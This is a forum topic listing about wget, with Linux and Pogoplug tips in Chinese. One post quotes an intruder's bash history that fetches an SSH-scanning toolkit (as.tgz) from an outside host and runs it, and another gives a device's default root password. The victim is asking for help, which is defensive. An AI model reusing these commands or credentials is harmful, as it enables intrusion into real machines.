由买买提看人间百态

topics

全部话题 - 话题: wget
首页 上页 1 2 3 4 5 6 7 8 9 10 下页 末页 (共10页)
m******n
发帖数: 1691
1
just use wget.
T*******x
发帖数: 8565
2
按照下面的教程。教程太简单了。卡在第二步fdisk上。
从来没用过fdisk,不知道怎么找flash drive。
我的是一个1G的usb flash drive,按照他给出的/dev/sda,不行。
然后configure partion 1 and 2,他都没给出命令。
高手指点一下吧。
1. Find your Pogoplug's IP address and connect via SSH:
username: root
password: stxadmin
2. Partition your flash drive.
fdisk /dev/sda
# Configure partion 1 as Linux (I recommend at least 512MB)
# Configure partion 2 as Linux Swap (256MB recommended)
3. Download and run the debian install script:
cd /tmp
wget http://projects.doozan.com/debian/docksta... 阅读全帖
m**k
发帖数: 18660
3
来自主题: Hardware版 - pogoplug 到底用多少电阿?
恩。外面的那台装ssh, disable root login.
另外那台LAMP + miniDLNA
还有简单email wget啥的
发现有一台不费电的24X7 的linux还是很爽的。可以做很多。
g*******t
发帖数: 7704
4
vpn server不是必须的, 不过不搞vpn, ssh回家能干什么? wget下载文件?
z***s
发帖数: 3241
5
来自主题: Hardware版 - Pogoplug E02挺难搞?
你说的是这个?
http://wiki.slimdevices.com/index.php/SqueezePlug#Install_Webmi
Edit sources list for installing webmin:
squeezeplug:~# nano /etc/apt/sources.list
Add the lines:
# webmin repository
deb http://download.webmin.com/download/repository sarge contrib
Write the file with + , confirm the filename with and
quit nano with +
squeezeplug:~# cd /root
squeezeplug:~# wget http://www.webmin.com/jcameron-key.asc
squeezeplug:~# apt-key add jcameron-key.asc
squeezeplug:~# rm... 阅读全帖
w****u
发帖数: 3147
6
来自主题: Hardware版 - finally, DynDNS is dead
我也是这家。换ip了wget一下或者curl一个url就好。随便写个script就可以update
e*i
发帖数: 10288
7
wget, haha
p***y
发帖数: 79
8
来自主题: Internet版 - wget 一问 -- urgent
should be easy in Java/VB....
using Microsoft Internet control.
e*i
发帖数: 10288
9
来自主题: Internet版 - ftp下载问题
change an ftp client, eg lftp, wget
t******n
发帖数: 28
10
来自主题: Internet版 - [转载] question about wget
【 以下文字转载自 Linux 讨论区 】
【 原文由 tiankhan 所发表 】
the following link display a figure in mozilla browser..
http://stockcharts.com/def/servlet/SharpChartv05.ServletDriver?chart=
%24SPX%2Cuu%5Br%2Ca%5Ddaoayiay%5Bde%5D%5Bpc20%21b50%21b200%5D%5Bvc60%5D%5
Bild14%21ll14%5D%5BJ6469410%2CY%5D
or the unwrapped one..
http://stockcharts.com/def/servlet/SharpChartv05.ServletDriver?chart=%24SPX%2Cuu%5Br%2Ca%5Ddaoayiay%5Bde%5D%5Bpc20%21b50%21b200%5D%5Bvc60%5D%5Bild14%21ll14%5D%5BJ6469410%2CY%5D
how can we save this
n*********g
发帖数: 75
11
did you try wget?
i*****f
发帖数: 578
12
来自主题: Internet版 - [help]how to telnet via proxy?
Hi,
is there way to telnet via proxy in CLI? I know there's some env. such as `
http_proxy' 'ftp_proxy' for wget, w3m, ftp, etc. But how to set to let
telnet be aware of the proxy???
Besides, is there a way to setup proxy for all the applications?
thanks!
S*******r
发帖数: 44
13
来自主题: Internet版 - 怎么自动把网页存下来--求答案
诸位老大,
我有大约一万个eBay网页要存local copy在自己的硬盘上,包括网页上的image 文件。
像这样的:
http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&category=107900&item=110238077277
我可以在firefox手存,有没有办法编程把这个过程自动化呢?
IE 存的时候会出错,否则可以用VB + IE control 来做。
也试了wget, eBay 说 "robot go away”. 是不是我没有设置对?
欢迎建议!perl, VB 等不限。
七七妈
g****n
发帖数: 3370
14
来自主题: Internet版 - 怎么自动把网页存下来--求答案
wget 加 mirror 参数也不行吗?
z*****a
发帖数: 471
15
wget -i 存储links的文件
m******t
发帖数: 635
16
来自主题: Java版 - Sun Java 被 Oracle 收购后,
自己动手丰衣足食,我给出个主意:
下载JDK7的那个site, 用wget的mirror功能就可以。然后用JDK6的那个css替换掉JDK7
的那个。
f*n
发帖数: 254
17
wget不行么?
u*********t
发帖数: 95
18
恩,跟我的要求类似,我是这样干的,
wget http://whatismyipaddress.com
mail 结果
把上面这个放到一个bat文件里,用XP的任务计划,半个小时更新一次
c**y
发帖数: 2282
19
如题,多谢!
E*V
发帖数: 17544
20
这个还不够?
c**y
发帖数: 2282
21
不够智能啊,例如我想通过正则表达式过滤url什么的
N****w
发帖数: 21578
22
自己写 perl... hehe
l******g
发帖数: 163
23
来自主题: Linux版 - 菜鸟 wget 问题求教
I updated it to the newest version. It still does not work. The error
message is the same.
Thanks
B*********s
发帖数: 292
24
来自主题: Linux版 - 菜鸟 wget 问题求教

in
如果你把你的link发过来,我会试试看。
h**o
发帖数: 548
25
我是要编一段程序(shell or perl) 看snoop里有无我要的字符串. 不是用眼睛看. 所
以winshark 和
ethereal 都不适和我.
假设我的snoop 结果 是 a.snoop,前文说的snoop.txt是我用
snoop -i a.snoop -x0 > snoop.txt 得到的. 但snoop.txt中可读的文本在最右列, 我
还得某种方
式把可读的文本取出来再search我要的字符串. 麻烦.
我现在想了一个别的办法:
snoop -i a.snoop -v > a1.txt, 这样我可以从a1.txt里得到packet headers 信悉了(而
我要找的字符串 就应在http header 里).如:
TCP: No options
TCP:
HTTP: ----- HyperText Transfer Protocol -----
HTTP:
HTTP: GET /beast_uns/index.php HTTP/1.0
HTTP: User-Agent: Wget/1.11.1 (Red Hat modified)
HTTP: Accept:
E*V
发帖数: 17544
26
vim
mplayer
wget
sed
awk
cut
E*V
发帖数: 17544
27
用perl, python之类的吧
a*****i
发帖数: 4391
28
不用cookie用什么?
Post token?
w*********r
发帖数: 18
29
FC9,一个软件的安装perl脚本总是报告缺少wget包,可是查询发现已经是最新版本,用
了ldconfig也不行,奇怪的是其他包都没有报错,这个脚本100多k,看着头疼,是不是
path不对?高手讲讲一般除了系统路径和ld.conf.cache,安装程序怎么检查哪些包已经
安装了?
p**i
发帖数: 688
30
来自主题: Linux版 - wget保存页面
你有没有试过把r的option去掉
`-r'
`--recursive'
Turn on recursive retrieving.
实在不行就用firefox吧
Z****e
发帖数: 2999
31
来自主题: Linux版 - wget保存页面
firefox/ie/chrome都试过了,遇见稍微复杂一点的带CSS之类的就不行了,比方
nytimes.com
去掉-r貌似就不下载图片了,ft
Z****e
发帖数: 2999
32
来自主题: Linux版 - wget保存页面
thanks, I know this come from man page, and I've tried, did not work very
well for some pages :(
Z****e
发帖数: 2999
33
来自主题: Linux版 - wget保存页面
found a firefox plugin called scrapbook, did the job, very cool!!
a*******e
发帖数: 3021
34
来自主题: Linux版 - wget保存页面
in websnap area, webzip is the best :)
z**r
发帖数: 17771
35
信了。一次5个版,不错。怎么能拿到这个script?貌似用wget就可以实现?
z**r
发帖数: 17771
36
不是据说就是一个http get吗?以前版上有人用perl写过用wget贴文章的script,应该
差不多
z**r
发帖数: 17771
37
来自主题: Linux版 - 想问问大家对于MAN的态度
看哪个程序的了。俺就觉得wget和xterm等的man pae非常好
A*******s
发帖数: 708
38
来自主题: Linux版 - 遇到黑客了!
家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
bash的history:
uname -a
cat /proc/cpuinfo
ps x
passwd
cd /var/tmp
ls -a
wget freewebtown.com/arapa/as.tgz
tar zxvf as.tgz
rm -rf as.tgz
cd as
rm -rf vuln.txt
touch vuln.txt
chmod +x *
screen
现在的问题是怎么才能看到screen的history,我不知道他在这里做过什么,突然好害
怕…
另外有人知道as这个是干嘛的吗?
$find as
as
as/scan.log
as/nobash.txt
as/a
as/pass.txt
as/sshd
as/start
as/screen
as/pscan2
as/vuln.txt
z*********n
发帖数: 94654
39
来自主题: Linux版 - 遇到黑客了!
你,sudo crontab -l -u download
看看你的download user有啥crontab在run
估计就是那个兰州小孩装了个crontab在运行什么东东
那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
呵呵
如果你的download user没啥权限说不定也没啥大不了的
貌似他想在你的download user地下起一个chroot小系统
看完了把download user删除了吧
userdel -r download

for
for
P**********n
发帖数: 94
40
http://www.5dlinux.com/article/1/2009/linux_33608.html
支持在Ubuntu8.10、Ubuntu9.04系统上自动安装微软雅黑、monaco-linux、lucida-
console等字体。
而且可以设置LED、CRT两种不同的显示器的渲染效果,无需手工配置,实现自动化安装。
使用方法如下:
打开命令控制器,然后运行下面的脚本(可以通过粘贴复制实现):
wget -O get-fonts.sh.zip http://files.cnblogs.com/DengYangjun/get-fonts.sh.zip
unzip -o get-fonts.sh.zip 1>/dev/null
chmod a+x get-fonts.sh
./get-fonts.sh
删除下载的字体安装脚本文件:
rm get-fonts.sh get-fonts.sh.zip 2>/dev/null
恢复以前的字体设置:
cd /etc/fonts/conf.avail
sudo mv 51-local.conf.old 51-local.conf 2>/
a*****i
发帖数: 4391
41

gnome-terminal or konsole + ssh.
Under KDE, use kget
Under GNOME, you can use gwget/downloader for X/uget/etc, it is extremely
easy to write one, just a wrapper around wget or cURL.
l*******G
发帖数: 1191
42
record desktop: recordmydesktop
video/audio editing: kdenlive
latex: gedit+latex plugin +texlive
Handwriting input: xournal + wacom bamboo
Take notes: tomboy
download: wget
figure making: xfig, kolourpaint
video/tv watching: gsopcast, gmlive
Reference management: jabref
bbs: pcman
E*V
发帖数: 17544
43
来自主题: Linux版 - 请推荐一本入门书吧
你现学习一下
echo
cat
ls
ps
man
什么是|
more | less | most (这里|是或者的意思)
tail | head
wc
bc
for
if else
test
&&
$() ${}
...
等有空了
研究一下正则表达式
sed| awk
wget
...
a*******e
发帖数: 3021
44
来自主题: Linux版 - 我的wget好快啊!!!
1000K .......... .......... .......... .......... .......... 0% 649K
23m34s
1050K .......... .......... .......... .......... .......... 0% 629K
23m12s
1100K .......... .......... .......... .......... .......... 0% 646K
22m50s
1150K .......... .......... .......... .......... .......... 0% 642K
22m31s
1200K .......... .......... .......... .......... .......... 0% 629K
22m14s
1250K .......... .......... .......... .......... .......... 0% 645K
21m57s
1300K .......... .
z**r
发帖数: 17771
45
来自主题: Linux版 - 我的wget好快啊!!!
家里还是公司?家里这样的话,速度很不错了,虽然比俺的还是慢些,哈哈
a*******e
发帖数: 3021
46
来自主题: Linux版 - 我的wget好快啊!!!
家里阿,这个肯定是假的,但得啥样的速度才能算出这么高的数阿。。。
z**r
发帖数: 17771
47
来自主题: Linux版 - 我的wget好快啊!!!
1.6MB才13Mbps的速度,也不算离谱吧,很多cable都可以,不用说光纤了
a*******e
发帖数: 3021
48
来自主题: Linux版 - 我的wget好快啊!!!
不是阿,看最后那行瞬时速度223M/s.... haha
o*****a
发帖数: 2335
49
来自主题: Linux版 - 我的wget好快啊!!!
俺用它的时候经常有负罪感
a*******e
发帖数: 3021
50
来自主题: Linux版 - 我的wget好快啊!!!
i heard curl supports javascript, not confirmed though.
首页 上页 1 2 3 4 5 6 7 8 9 10 下页 末页 (共10页)